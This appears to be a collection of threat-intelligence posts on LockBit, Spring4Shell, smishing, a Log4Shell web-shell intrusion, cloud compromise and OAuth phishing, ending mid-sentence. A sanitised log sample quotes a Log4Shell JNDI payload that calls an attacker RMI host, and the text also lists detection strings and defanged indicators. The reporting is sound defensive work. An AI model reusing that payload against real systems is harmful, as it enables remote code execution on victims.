CVE-2021-20023SonicWall Email SecurityPrivilege Escalation Exploit Chain3 November 2021A vulnerability in version 10.0.9.x allows a post-authenticated attacker to read an arbitrary file on the remote host.
CVE-2021-20016SonicWall SSLVPN SMA100SQL Injection Vulnerability3 November 2021A vulnerability in SMA100 build version 10.x allows a remote unauthenticated attacker to perform SQL query to access username, password and other session related information.
CVE-2021-20018SMA 100 AppliancesStack-Based Buffer Overflow Vulnerability28 January 2022SonicWall SMA 100 devices are vulnerable to an unauthenticated stack-based buffer overflow vulnerability where exploitation can result in code execution.
CVE-2021-20028SonicWall SRASQL Injection Vulnerability28 March 2022SRA products contain an improper neutralisation of a SQL Command leading to SQL injection.
Table 1 – CISA known exploited vulnerabilities catalogue listing various critical SonicWall CVEs that were being exploited in the wild as of 2 April 2022

The ongoing evolution of TTPs allowed LockBit’s affiliates to become the most prolific ransomware actors in 2022. Between 1 January and 31 March 2022, the group claimed 223 victims on their dark web leak site, compared to Conti’s 125. This equates to more than one-third of all known ransomware incidents for Q1 2022. To put it in another way, over the same period LockBit’s affiliates claimed almost 10 percent more victims than the other 24 known ransomware groups combined (223 compared to 164). LockBit’s reported activities have also increased over the course of the first three months of 2022. The gang claimed 112 victims in March, while it published details of 111 companies in the previous two months combined. This suggest an ongoing trend highlighting how LockBit will likely remain the most active ransomware-as-a-service offering for the coming months.

Figure 4 – Number of victims published on ransomware dark web leak sites between 1 January 2022 and 31 March 2022

Conclusion

Lockbit 2.0 affiliates work on behalf of the Lockbit group to conduct ransomware campaigns against organisations and industries across the globe. The affiliates’ abilities to conduct the intrusion and execution of Lockbit 2.0 ransomware vary, and through these incidents we observed affiliates with a diversified capability and skillset exploit a known SQLi vulnerability in a novel way to circumvent the MFA access control and obtain initial access. At least 100 organisations in Hong Kong and Macau are at potential immediate risk, and we foresee that if left unpatched, this could pose a threat that adversaries may exploit to gain unauthorised access through exploitation of this vulnerability. We will continue to monitor the situation and assist organisations as needed. In the next blog post, we will also share further details on the TTPs leveraged by LockBit affiliates as a result of our recent incident response experience with reference to the MITRE ATT&CK Framework, such that organisations can better prevent and detect malicious activities related to this RaaS group.

Recommendations

For organisations that have deployed the vulnerable versions of SonicWall SRA SSLVPN, we recommend the following actions immediately in the following order:

  • Upgrade legacy SRA SSLVPN device(s) running firmware 8.x given they are not supported by SonicWall; apply patches to the impacted versions of the 9.x or 10.x firmware.
  • Reset all user account Active Directory credentials that had previously authenticated via the SonicWall SRA SSLVPN. In particular, the Active Directory credentials that is tied to the SonicWall SRA device for authentication purpose should be changed.
  • Re-bind users’ second authentication factor (e.g., Google or Microsoft Authenticator) app with an updated TOTP, and ensure that users store their newly generated backup codes securely.[11]
  • Review the privileges granted to the Active Directory account tied to the SonicWall SRA device for user authentication purpose, and remove excess permissions where possible to adhere to the principle of least privilege. In general, Domain Administrator privilege should not be used.
  • Perform a review of access management with respect to identity and network access (e.g., removal of legacy and unused accounts, housekeeping of privileges for all accounts, and enforce network segmentation to tighten access to key servers).

Meanwhile, defending against undisclosed exploits are extremely challenging, but not impossible if organisations adopt a defense-in-depth approach. The following guiding principles should be observed:

  • Require multi-factor authentication for all services to the extent possible, especially on external remote services. 
  • Implement a robust threat and vulnerability management programme that leverages cyber threat intelligence to achieve a resilient security posture. Specifically:
    • Maintain regular cybersecurity patching hygiene practices, including a robust baseline that patched known exploited vulnerabilities and aims to reduce known attack surface. 
    • Leverage cyber threat intelligence to prioritise the remediation scale and timeline on a risk-based approach, through the incorporation of indications and warnings regarding trending threats per available proof-of-concept code, active exploitation by threat actors, and Darknet chatter.
  • Maintain “tertiary” offline backups (i.e., tertiary backup) that are encrypted and immutable (i.e., cannot be altered or deleted). This should be atop of your existing secondary data backups that should adopt security best practices, in particular network segmentation with your production and/or primary site.
  • Develop and regularly test the business continuity plan, ensuring that the entire backup, restoration and recovery lifecycle is drilled to ensure the organisation’s operations are not severely interrupted.

MITRE ATT&CK TTPs Leveraged

We include the observed MITRE ATT&CK tactics and techniques elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Initial Access: Valid Accounts (T1078)
  • Impact: Data Encrypted for Impact (T1486)

Indicators of Compromise (IoCs)

We include the observed IoCs elaborated from part one of the blogpost. We will expand this list as we deep-dive into the affiliates’ TTPs as observed from our incident response experience in Q1 2022.

IndicatorType
7fcb724c6f5c392525e287c0728dbeb0MD5
adead34f060586f85114cd5222e8b3a277d563bdSHA-1
822b0d7dbf3bd201d6689e19b325b3982356c05bc425578db9aa4ce653deaaa7SHA-256
LockBit_9C11F98C309ECD01.exeExecutable File
.lockbitEncrypted Files Extension
91.219.212[.]214IPv4 Address
5.206.224[.]246IPv4 Address
51.91.221[.]111IPv4 Address
213.186.33[.]5IPv4 Address
194.195.91[.]29IPv4 Address

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Thousands of organisations in Hong Kong and Macau impacted by Spring Core Remote Code Execution Vulnerability

Impacted organisations include financial services and critical infrastructure providers

On 29 March 2022, security researchers posted a now-removed screenshot to Twitter purporting to show a trivially-exploited unauthenticated remote code execution (RCE) vulnerability in the Spring Framework, one of the most popular Java frameworks in use globally.[1] While the screenshot did not include a proof of concept or public details, Proof of Concepts dubbed “SpringShell” or “Spring4Shell” have since emerged since 30 March 2022 and have been validated by DarkLab to be working exploits.[2]

The Spring Framework is among the most widely used lightweight open source framework for Java, as a result of its design philosophy that enables developers to focus on business logic, while simplifying the development cycle of Java enterprise applications.[3] Given its widespread use globally, the nature of the vulnerability being more general such that there may be unknown and additional ways of exploiting it, the impact of this vulnerability is compounded significantly and would be in excess of the impact observed for infamous vulnerabilities such as Log4Shell (CVE-2021-44228).

Technical Analysis

Based on analysis on consolidated data source and technical analysis, DarkLab has been able to recreate the attack in a simulated environment. In order to exploit this vulnerability, an unauthenticated attacker must send a crafted HTTP request to trigger the mechanisms through parameter binding functions of the framework to achieve arbitrary file write, with calls to specific Java ‘classLoader’/’pipeline’ functions. It is likely that the Spring Framework does not handle these calls properly, allowing for arbitrary writing of the JSP web shell to the root directory of the server, which can then be interacted with for unauthenticated remote code execution.

Figure 1 – redacted screenshot of successful simulated exploitation of RCE vulnerability that landed us a JSP web shell at the backend server

DarkLab has been actively performing discovery using our proprietary PoC since 30 March 2022.  As a result of conducting the scan across all external facing applications in Hong Kong and Macau, we observed that over thousands of organisations – including financial services and critical infrastructure providers – are potentially vulnerable to the unauthenticated RCE vulnerability. At the time of writing, the scope of impacted organisations and the broader implications of exploitation are still being estimated and not fully known, as it depends on whether particular functions are used within the Spring application.[4] The general nature of the vulnerability implies there may be other still undiscovered methods to exploit it.

Probability of Exploitation by Threat Actors

Given that this is an unauthenticated RCE vulnerability in the widely-adopted Spring Framework, it is likely that it will present an attractive exploit for a variety of threat actors to weaponize and add to their arsenal for the purpose of obtaining initial access to unsuspecting victims’ systems.

Per DarkLab’s Deep and Dark Web monitoring, we observed on 29 March 2022 that English-speaking threat actors had exchanged messages via Telegram requesting for a working exploit code. While we are unable to ascertain with confidence whether they obtained this information through communication exchange, we observed clear intent from these threat actors to leverage the unauthenticated RCE vulnerability to perform malicious activities against a specific range of targets. This includes exfiltrating sensitive personally identifiable information from South Asian state-owned enterprises, which suggests that these threat actors have a more targeted mindset and are capable of directing their attention to the observed vulnerable organisations in Hong Kong and Macau should it align with their objectives.

While there has not been active exploitation in the wild for Spring4Shell, we posit that threat actors of various objectives – ranging from espionage to financial motivation – will continue to invest resources to explore how best to weaponise the vulnerability to achieve their goals. DarkLab will continue to monitor the Deep and Dark Web for more insights on their innovations and targeting and provide updates as necessary.

Conclusion

In summary, this unauthenticated RCE vulnerability in the widely-adopted Spring Core makes it an attractive proposition for threat actors of all profiles and motivations. In particular, the general nature of the vulnerability implies there may be other ways to exploit it. As a result, we expect threat actors of all motivations will invest resources to innovate new techniques; until then, detection opportunities will remain limited. This implies that teams should first rely on their defense-in-depth security controls to mitigate the known risks, while continuing to track the status of this vulnerability regarding preventive and detective controls as they become publicly available.

Recommendations

Organisations using affected versions 5.3.x should upgrade to 5.3.18+, while versions 5.2.x should upgrade to 5.2.20+. However, there are other workaround solutions for applications that cannot upgrade to the above versions as listed on the Spring blog post.[5]

From a detection perspective, exploitation attempts will require HTTP requests making use of Java classes. As such, filtering for strings such as “class.“, “Class.“, “.class.“, and “.Class.” may detect exploitation attempts.

In addition, we strongly urge our clients to consider the following:

  • Review their application stack to ascertain the scope of impact in preparation for the impending patch to be released.
  • Monitor the official Spring vulnerability report [6] or Git repository for further updates to the patch releases and apply accordingly.[7]
  • Leverage cyber threat intelligence to monitor for further updates to the threat landscape as a result of new information pertaining to the unauthenticated RCE vulnerability.

MITRE ATT&CK TTPs Leveraged

  • Initial Access: Exploit Public-Facing Application (T1190)
  • Execution: Exploitation for Client Execution (T1203)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

Smells SMiShy to me…

Macau SMS Phishing Unveils Threat Actor Close to Home

On 2 March 2022, Darklab observed SMS phishing (smishing) activity targeting mobile users in Macau. The message masqueraded as the courier service DHL delivering a package to the victim. The intended purpose was to steal victims’ credentials, personally identifiable information (PII), and credit card details.

Smishing campaigns via the fraudulent use of the DHL brand is far from uncommon.[1] Indeed, the Macau Polícia Judiciária issued a notice on 24 February 2022 to warn citizens about fraudsters masquerading as counterfeit courier companies to trick victims into providing their personal information.[2]

However, we were interested in this case as the threat actor behind it had also registered several fake domains masquerading as other reputable companies in Hong Kong and Singapore, such as Hongkong Post and Singapore Post. While we are used to phishing and smishing campaigns globally, when this happens in our virtual backyard it draws our attention as it can pose a real threat to users in Hong Kong, Macau, and Singapore.

Smishing Incident in Macau

The initial malicious SMS message came from a sender named INFO. Recipients are requested to click the provided hyperlink to reschedule the package pick-up date and time as the previous attempt was not delivered successfully.

Figure 1 – Initial SMS phishing message sent to the victim
Figure 2 – Image displaying the fraudulent delivery status

Once the victim has opened the link, a page appearing to be the Hong Kong DHL Express displays a phony delivery schedule page with free text fields that the recipient is supposed to complete to schedule a delivery time. Information requested includes user’s full name, contact number, residential address, city, and postal code.

Figure 3 – image of the phony page requesting the victim into inputting their credentials

After inputting the personal information and clicking the submit button, the victim is redirected to another page that requires them to select their preferred delivery option.

Figure 4 – fraudulent DHL HK page asking victims to proceed to the payment card page

Upon selecting the preferred delivery option, the fraudulent DHL HK site requests for the victim to input financial information, including name, credit card number, expiration date, and CVV number. Once in possession of users’ payment card details, criminals can resell them online or conduct financial fraud themselves.

Figure 5 – Final page designed to capture the victims’ credit card details

Something Smelt Smishy…

The risk of smishing has increased at an alarming rate as a result of the Covid-19 pandemic. While this is not entirely a new trend, we observed that the messages are becoming increasingly deceptive as they look to trick victims into providing their personal information.

What threw us off was the fact that the URL within the smishing text redirected users to the URL hongkong-post[.]net/918srx, which was a Russian IP address – 31[.]28[.]27[.]151 – hosting the fake DHL site. The same IP address also hosted the domain dhl-post[.]hk.  Both malicious domains and their associated SSL certificates were created after 28 February 2022, just a few days before the beginning of the smishing campaign.

Additionally, hongkong-post[.]net had mail exchanger (MX) records, which suggested the threat actors’ intent to send and/or receive emails.[3] We also saw MX records for another domain, singapore-post[.]com, hosted on the same IP address and created on 7 March 2022. Overall, the existence of young domains with MX records mimicking legitimate brands is a strong indication of likely phishing intent, which security teams should be monitoring for.

The historical WHOIS lookup for the domains revealed that the registrar company is NiceNIC INTERNATIONAL GROUP CO., LIMITED (NiceNIC.NET) based in Hong Kong.[4] While pivoting through the Registrar Name and NiceNIC.NET’s Chinese company name “耐思尼克國際集團有限公司”, we observed 21 additional domains associated with this registrar as of 8 March 2022. At least four of the domains (xjam[.]hk, canadahq[.]hk, kaddafi[.]hk, and aij[.]hk) were flagged by security scanners as likely malicious. Furthermore, there were newly registered domains (aididas[.]com[.]hk) that were not yet flagged by security scanners, though strongly looked like a fraudulent website.

Meanwhile, we also observed that canadahq[.]hk had relation resolutions to a known bad Russian IP address 185[.]178[.]208[.]186, which hosted files to download the Trojan “Win32.Trojan.Raasj.Auto”. This Trojan was first observed in 2017 per various open source threat exchange platforms[5], and there are various web posts elaborating the various impacts to the victim.

In one instance, the Trojan is elaborated to have performed as the spyware that steals sensitive information such as credit card details and passwords for sale and profitability.[6] On the other hand, the Trojan was deemed to have been altered and linked to the “Trojan-Ransom.Win32.Shade.Ino” ransomware that cybercriminals deliver via phishing emails to conduct online frauds. The ransomware ciphers documents on the hard drive and prevents normal access to the victim’s workstation, with a ransom note locatable on the local drive upon reboot that demands payment to decipher the data.[7] A third web post noted that the “Win32.Trojan.Raasj.Auto” Trojan would hijack victims’ web browser to cause web redirection issues, and slow down the overall System and Network performance speed.[8]

Overall, the links to relatively low level malware suggests a financially motivated campaign spanning multiple years and only recently focusing on Hong Kong and South East Asian targets.

Figure 6 – Pivoting out from 耐思尼克國際集團有限公司 to identify further known-bad malicious domains and IP addresses, along with the Trojan “Win32.Trojan.Raasj.Auto

Conclusion

Through a Macau smishing campaign, we were able to uncover a wider campaign targeting Hong Kong, Macau, and Singapore and involving a network of malicious Hong Kong domains registered by the same local registrar. A specific domain had a resolution history to a Russia-based IP address reportedly linked to Trojans used since at least 2017, suggesting it was likely rented by or associated with multiple cybercriminal threat actors. Our assessment is reinforced by the fact that the original domain exploited for smishing, dhl-post[.]hk, was hosted by a Russian server, which is a relatively rare occurrence in Hong Kong.

Recommendations

While phishing and smishing abusing legitimate brands will remain a problem, companies can take action to mitigate and prevent the threat they pose.

  • Organisations should update their email security solution and network devices (including external firewall, web proxies) to detect for potential inbound/outbound connections from the known-bad domains and IP addresses in this post.
  • Users should remain wary of the legitimacy of webpages and their branding, and access websites via the global webpage as opposed to the URL shortened link if in doubt. Impacted companies should issue circulars and alerts as necessary when impersonation attempts are detected.
  • Organisations should conduct young domains monitoring and alert against potentially suspicious domains for further action. This task is typically conducted by our Security Operations Centre for subscription clients. We have already informed both DHL and Hongkong Post to investigate, and if necessary perform takedown of fake domains dhl-post[.]hk and hongkong-post[.]net.
  • Registrars should enhance their onboarding due diligence to reduce the risk of provisioning of domains impersonating legitimate brands, and should regularly reviews activities of those domains to ensure their use for ethical and non-malicious activities.

MITRE ATT&CK TTPs Leveraged

  • Initial Access: Phishing (T1566)
  • Initial Access: Phishing: Spearphishing Link (T1566.001)
  • Execution: User Execution (T1204)
  • Credential Access: Input Capture – Web Portal Capture (T1056.003)
  • Collection: Input Capture (T1056)
  • Collection: Browser Session Hijacking (T1185)
  • Exfiltration: Automated Exfiltration (T1020)
  • Impact: Data Encrypted for Impact (T1486)
  • Impact: Account Access Removal (T1531)
  • Impact: Endpoint Denial of Service (T1499)

Indicators of Compromise (IOCs)

• hxxps://hongkong-post[.]net/e/authID=UEjJc/tracking.php?sessionid=4g3ihd1ej09+6b+27fc58arSZF+27+5p9Ba8+D6Y+Gg3ok+4+1uIEOgCLfMSPmNKwbHwTAaX+J42951997505
• dhl-post[.]hk
• hongkong-post[.]net
• singapore-post[.]com
• xjam[.]hk
• canadahq[.]hk
• kaddafi[.]hk
• aij[.]hk
• aididas[.]com[.]hk
• 31[.]28[.]27[.]151
• 185[.]178[.]208[.]186

Feel free to contact us at [threatintel at darklab dot hk] for any further information.

A look Behinder the scene

Popular web shell exploited after Log4Shell for data theft

DarkLab recently responded to an incident affecting a Hong Kong organisation in the retail sector. Threat actors exploited the vulnerability CVE-2021-44228 in the Apache Log4j library, also known as Log4Shell, as initial infection vector (link). While we observed multiple attempted exploitation of Log4Shell against our Managed Security Service clients since its initial reveal on 10 December 2021, this was the first instance where we observed Log4Shell exploited in a prolonged network intrusion whose aim was not the typical crypto-mining or ransomware deployment for financial gain.

After initial access via Log4Shell, the actor dropped the Behinder web shell on the victim’s public-facing web servers. They exploited this access sporadically over a period of 51 days to retrieve additional information from backend database servers, which led to an increase in network activity and their subsequent discovery.

Initial access and web shell deployment  

Log4Shell is a software vulnerability in the Apache Log4j 2, a popular Java library to extend logging capabilities in applications. The vulnerability enables a remote attacker to gain the ability to execute arbitrary code and take control of a device running vulnerable versions of Apache Log4j 2.

In this instance, we observed that the adversary performed manual probing to identify an entry point in the login page of a victim’s public-facing web server. The adversary spent several hours repeatedly interacting with the vulnerable webpage. Such prolonged interaction with the identified target suggest attackers were not just running automated scripts like we have seen many opportunistic threat actors do, but rather had a degree of interest in compromising this victim.

# Entry in Nginx
x.x.x.x – – [1/Jan/2022:08:00:00 +0000] “POST /login/logincheck HTTP/1.1” 302 0 “[https:]

//www.victim.com/victim/login” “Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36” “x.x.x.x”
# Corresponding entry in Apache Log4j log
INFO | jvm 1 | main | 2022/01/01 08:00:00.130 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’
INFO | jvm 1 | main | 2022/01/01 08:00:00.433 | org.app.victim.UnhandledException: Invalid id ‘${jndi:rmi://x.x.x.x:1099/oHg5SJ}’

Fig 1 – log sample showing threat actors’ exploitation attempt. The sample has been sanitised to maintain the victim’s anonymity.

Once successfully exploited Log4Shell, they dropped the Behinder web shell (or “冰蝎”). Behinder is a versatile, multi-platform web shell created by a Chinese-speaking developer and popular within the hacking community in the same country (link). This web shell allows for AES-encrypted command and control (C2) traffic (link), which helped the threat actor maintain stealth and persistence in their victim’s environment.

Fig 2 – example of Behinder web shell’s user interface, likely used by the attacker to interact with the victim’s environment

The threat actor then performed enumeration of the internal system with the web shell and obtained the application credentials to access the backend application database. In this database the threat actor issued search queries via the web shell. These used terms revealing their interest in customer data such as customers’ names, email addresses and residential addresses. At this point, limited log availability did not allow us to determine the amount and nature of data accessed and exfiltrated.

Intruders interacted with the compromised servers via throwaway infrastructure. They used Vultr Virtual Private Servers (VPS) hosted in South Korea for several consecutive days, followed by VPS hosted in Japan in the subsequent network spikes. Adversaries typically rent VPS from service providers such as Vultr to host their C2 servers while masking the origin of their source IP addresses, thereby preventing security researchers to easily trace and link their infrastructure with previously known intrusions.

Who is Behinder the intrusion?  

We do not have enough evidence to confidently attribute the intrusion to a known threat actor group. The large amount of customers’ personally identifiable information the victim held was of likely interest to financially and politically-motivated threat actors alike.

However, the use the Behinder web shell strongly suggests a Chinese-speaking threat actor. We also noticed how a recent open source paper (link) on the Earth Lusca group describes the actor as using Vultr VPS infrastructure and dropping Behinder, which match our observed activity. Notably, Earth Lusca has also previously targeted Hong Kong organisations. However, this allegedly state-sponsored group routinely exploits malware like Winnti and Cobalt Strike which we have not seen in this incident. This, and the relatively generic TTPs observed, hinders any confident attribution assessment.

Recommendations

  • Echoing our 2022 predictions advice, organisations should profile their attack surface to understand services open, technologies used, and known vulnerabilities. Patching programmes should enable a threat-based prioritisation of missing security patches and facilitate rapid deployment of critical security patches within aggressive timeframes.
  • Build a robust enterprise security architecture with layered defense to address potential security risks to critical assets (i.e., data, infrastructure, applications).
  • Enable security audit logs to ensure maximum visibility on existing security monitoring. In particular, ensure that logs’ retention period is sufficient to support after-the-fact investigations of potential incidents.
  • Implement specific mitigations against Log4Shell and related Log4j-related vulnerabilities including blocking specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic

MITRE ATT&CK TTPs Leveraged

  • Reconnaissance: Active Scanning (T1595)
  • Initial Access: Exploit Public-Facing Application (T1190)
  • Persistence: Server Software Component – Web Shell (T1505.003)
  • Discovery: File and Directory Discovery (T1083)
  • Discovery: Network Service Scanning (T1046)
  • Collection: Data from Local System (T1005)
  • Command and Control: Application Layer Protocol – Web Protocols (T1071.001)
  • Command and Control: Encrypted Channel – Symmetric Cryptography (T1573.001)
  • Exfiltration: Exfiltration Over C2 Channel (T1041)

Indicators of Compromise (IOCs)

Feel free to contact us at [threatintel at darklab dot hk] for the full set of Indicators of Compromise (IOCs).

What to expect in 2022

We do not have a crystal ball to predict the future. However, we have plenty of experience in researching, responding, and mitigating cyber threats for our clients. The last eighteen months saw a dramatic evolution of the cyber security challenges companies face. Based on what we are observing in the threat landscape and the conversations we are having with industry leaders across sectors, here we outline what DarkLab cyber threat analysts assess will be some of the most relevant issues in 2022. 

Ransomware profits will ensure ongoing exploitation by lesser-known gangs 

Human operated ransomware with a double extortion tactic exploded in 2020, kept growing in 2021, and we expect it to continue to pose a high threat to organisations in 2022. Our analysis of ransomware groups’ posts on the darkweb show no sign of the underground industry slowing down.  

What we expect to change is criminals’ branding tactics. Well known ransomware-as-a-service outfits like BlackMatter and REvil exploited their fame to attract affiliates and threaten victims into meeting their ransom demands. However, their high profile attracted law enforcement attention, including in their domestic countries like Russia, and has led to these groups’ downfall. A logical reaction will likely see cybercriminals avoiding the same mistakes and maintaining a lower profile. Expect a larger number of smaller ransomware gangs in 2022. 

Increased threat to cryptocurrency businesses  

While extortion has been the main profitable enterprise for cybercriminals in 2021, the profits will likely be reinvested in diversifying operations. Sophisticated groups like APT38 and individual hackers have in 2021 shown the potential profitability of targeting cryptocurrency exchanges and start-ups. Laundering millions of dollars worth of cryptocurrency is, for now at least, easier for criminals than to move large sums across the traditional financial system.  

As more and larger companies join the cryptocurrency business, and regulators still lag behind in imposing strict anti-fraud controls, there is a likely window of opportunity for criminals to exploit.  

Increased emphasis on private sector players in espionage operations 

Security researchers have warned of the threat posed by private sector spyware providers for a long time, although governments have only recently acted on it and imposed sanctions on some of the best known companies in the field. Israeli companies like NSO and Candiru are the highest profile names in a crowded industry providing many shades of services, from legitimate offensive toolsets to hack-for-hire operations, particularly in South and South East Asia.  

Even though governments worldwide have allegedly used private sector contractors in part of their offensive operations’ supply chain, last year’s increased media and government interest has put a spotlight on the issue. We expect more such campaigns to be highlighted in 2022.

Cloud supply chain is a potential single point of failure 

This prediction is, we truly hope, one that is not going to happen in the coming year, but rather a wider concern based on the dynamics we are observing in the IT industry and the cyber  threat landscape.  

Companies have moved to the cloud at an unprecedented speed during the last two years, and we are not seeing any deceleration on the horizon. However, increased data crunching in the cloud is not always met with a proportional increase in cloud security spending, best practices for which are still in their relative infancy.  

The number of trusted cloud vendors are also limited, with a few very large companies hosting most of the world’s data. Granted, companies like Microsoft, Amazon, Tencent and Alibaba have very good security teams and large security budgets. However, they also represent obvious central systems linked to many large organisations of interest to threat actors. Cloud systems’ outages, like those affecting a major US-based provider in December 2021, demonstrated the potential impact an attack on these companies could have on their customers.  

The mass and rapid exploitation of MS Exchange, ProxyShell and Log4shell also showed how adept threat actors are at weaponising vulnerabilities in widely used digital systems, and how these campaigns can paralyse security teams worldwide for weeks.  

Finally, the most sophisticated among threat actors, like APT29/Nobellium, have already demonstrated their intent and capability to successfully exploit cloud supply chain to gain access to high profile targets. Our experience suggests that where sophisticated state-sponsored threat actors go, criminals eventually follow.  

As such, the exploitation of cloud supply chain is likely among the highest threats to organisations in 2022 and beyond. Fortunately, much can be done to mitigate this threat by careful planning, including thorough application of zero-trust architecture and a shift-left approach to cloud devsecops. 

Recommendations to secure your 2022

We do not expect the challenges facing cyber security professionals in the coming year to be less ominous that those we just put behind us. Nonetheless, 2021 taught us plenty of useful lessons that can equip companies with the right strategies and tools to successfully mitigate cyber threats we may face in 2022.  

  • Comprehensive intrusion defense strategy: Our incident response and threat hunting experience suggests that a few best practices go a long way to prevent most  network intrusions:  
    1. Attack surface hardening: enterprises should focus on profiling their attack surface including services open and technologies used, and reducing their internet-exposed infrastructure.  
    2. Identifying and protecting critical internal systems: threat actors, especially ransomware operators, actively look for systems in their victims’ network that serves crucial functions and holds sensitive data  (e.g. Domain Controllers, backup servers, file servers). Securing these systems would reduce the impact of an intrusion and increase likelihood of detection, while increasing costs for attackers. 
    3. Defending against lateral movement: the majority of threat actors moving across network rely on mechanisms that are relatively easy to disrupt with security restrictions such as restriction of remote desktop protocol between user zones, and disabling Windows Remote Management, among others. 
    4. Protecting user accounts and privileged access: good credentials protection and management are key measures in limiting credential theft and abuse. Security measures should include multifactor authentication for remote access or sensitive access, house-keeping of user and system accounts, credentials hardening for privileged accounts by using managed service accounts (MSA) and protected user group.  
  • Risk-based security controls help overcome limitations: budget and human resources are finite resources. Prioritising them in the most efficient way is crucial to a timely and effective security strategy. Companies should understand intent and capabilities of the most likely threats they face. Assessing the likelihood of threats to a critical systems and their potential impact is what makes a risk-based approach to security effective. By understanding the most likely TTPs threat actors will use against your most important systems, companies can prioritise the application of the most urgent security controls.  
  • Cloud security needs a strategy: as threats to cloud mature, so should organisations’ strategies to secure their cloud systems. Cloud posture monitoring and cloud-specific Mitre ATT&CK TTPs detection use cases can help in identifying ongoing threats. Using existing blueprints for cloud deployment, a shift left approach to DevSecOps, and enhancing automation with infrastructure-as-a-code are important preventive measures that also help alleviate the ongoing scarcity of cyber talent.  

Trouble in Paradise

A case study of Cloud compromise

Many organisations are increasingly moving to cloud solutions to solve their hosting needs, but outsourcing workload should not imply outsourcing security as well. The importance of security the cloud was recently highlighted by targeting of Microsoft Azure environments by Nobellium, the threat actor behind the SolarWinds Orion compromise. The threat actor notably exploited stolen SAML certificates for vertical movement, a rarely seen technique. Even without novel techniques, less sophisticated cybercriminal threat actors can also pose a threat to companies’ services in the cloud. Indeed, this week’s supply chain compromise operation by REvil is suspected to have been launched from a compromised web server hosted on AWS.

The Incident

Recently, DarkLab’s incident response team has helped a South Asian client in the media sector to remediate an incident involving multiple cloud environments breaches, a case study we think can help organisations better plan for secure implementations of their cloud environments.

The incident originated from a likely exploitation of a known remote code execution vulnerability in a Jenkins instance, an open source software development automation server. The server was hosted in an Amazon Web Service (AWS) environment and had a hardcoded root access key. With that, the threat actor was able to roam the compromised environment undetected for four months. Logs availability has been an issue due to the lack of CloudTrail log retention but we know that the threat actor created multiple IAM user accounts and accessed internal data, including those stored in S3 buckets via the free Windows client S3 Browser.

Their primary intent, however, was to use the victim as a jumping spot to identify other targets vulnerable to the same Jenkins RCE and move laterally to their servers. They did so by deploying Linux and Windows virtual machines in new EC2  instances  in the compromised environment to scan and exploit external IP addresses. The did so using T.2 micro sizing to avoid spikes in usage and remain hidden. The attacker deployed the additional EC2 instances in a different AWS region than that used by the victim, an anomaly that we suggest organisations monitor for.

A deeper dive into the system log of the Linux VMs shows that the attacker likely used Shodan to identify other vulnerable Jenkins instances online, suggesting their targeting was likely opportunistic. Similarly, analysis of the IP addresses used by the attacker to access our client – most of them AWS instances themselves – suggests the attack likely originated from multiple other compromised organisations.

From AWS, the threat actor managed to access a FTP server within a parallel Google Cloud Platform (GCP) environment. For this, they used a compromised hard-coded credential found in one of the configuration files in their BitBucket repository, also suspected to be compromised. After thorough environment and users’ enumeration, the attacker was able to obtain the password for another G-Suite user account, which they used to access data in the GCP environment and Google Drive.

Shortly after accessing the GCP,  threat actors attempted to cover their tracks by deleting the company’s entire production environment, all hosted on AWS, and the backup copies. Fortunately, AWS retained some copies of the deleted backups which were able to provide to the victim organisation.

However, while the victim restored their AWS system they were not aware to reset the root access key. Unsurprisingly, the attacker quickly re-established a presence in their cloud and a few days later they re-deleted the production environment, although no ransom demand was recorded. This was when our incident response team was called to help.

Assessment

Our investigation suggested that the threat actor behind this campaign is likely operating opportunistically and with a relatively low technical know-how. We often found traces of internet searches for open source tools or “how to” techniques. Nonetheless, such an actor could still pose significant operational damage to a large company by deleting their production environment.

The incident shows how even relatively unsophisticated threat actors are adopting an island-hopping approach by abusing imperfect implementations of commercial cloud platforms. Companies should ensure that standard security practices, like rotating passwords or access keys, monitoring suspicious activities, and prompt patching, are also applied to cloud environments.

What’s next?

Our experience suggests that this was not an uncommon attack path for adversaries targeting cloud environments. Monitoring for common attack vectors can help indeitifyuing supicious behaviour earlier and contain an incident before it is too late.

Below are some monitoring metrics mapped against Mitre ATT&CK tactics that we recommend organisations implement to AWS Config, Lambda, or their choice of CSPM platforms for automated detection and remediation.

Feel free to contact us at [threatintel at darklab dot hk] for the full set of 50 custom MITRE-based rules on AWS

TacticTechnique (custom)Log Source
Initial accessAWS user login failed multiple timesCloudTrail
Initial accessMultiple worldwide successful console login GuardDuty
Initial accessPotential Web scanning activities with multiple web server 400 error from same the source IPWeb access log
Privilege EscalationAWS “AssumeRole” from rare external AWS accountCloudTrail
DiscoveryAWS potential IAM enumeration ActivitiesCloudTrail
Defense Evasion/ PersistenceCreate/Update managed policy with excessive permissionCloudTrail
ImpactAWS Access Key EnabledCloudTrail
ExfiltrationEgress rule added to a security groupCloudTrail

Not Token for Granted

New phishing campaign against financial services steals OAuth tokens to bypass MFA in O365 accounts

DarkLab recently discovered a suspicious email which we identified as part of an active phishing campaign primarily targeting banks and investment companies worldwide, including a number of targets in Hong Kong. The campaign initially seemed aimed at stealing victims’ credentials, a common tactic among threat actors. However, a closer look showed that threat actors leveraged OAuth2 framework to gain permissions to the victim’s O365 account by exploiting a rogue Azure application. This would have allowed them to bypass multifactor authentication controls and directly access the victim’s account with a stolen OAuth token, rendering this a particularly effective social engineering tactic.

Overall, this campaign shows how financially motivated threat actors are evolving their tactics, techniques, and procedures to exploit companies’ increasing reliance on cloud infrastructure.

Phishing email analysis

The email is sent from a domain of a separate entity, likely compromised by the threat actor before initiating the attack against our client. The email metadata also suggests deliberate spoofing of the SMTP FROM header.

The email contains a fake e-signature verification request, along with a link to “Review and sign”.

The link is crafted to present the user with a request screen (see figure above) to grant permissions to a rogue Azure application. Depending on threat actors’ intent, permissions request can be modified to allow access to cloud-hosted documents and applications, including the email account.

Here is an example of the phishing link:

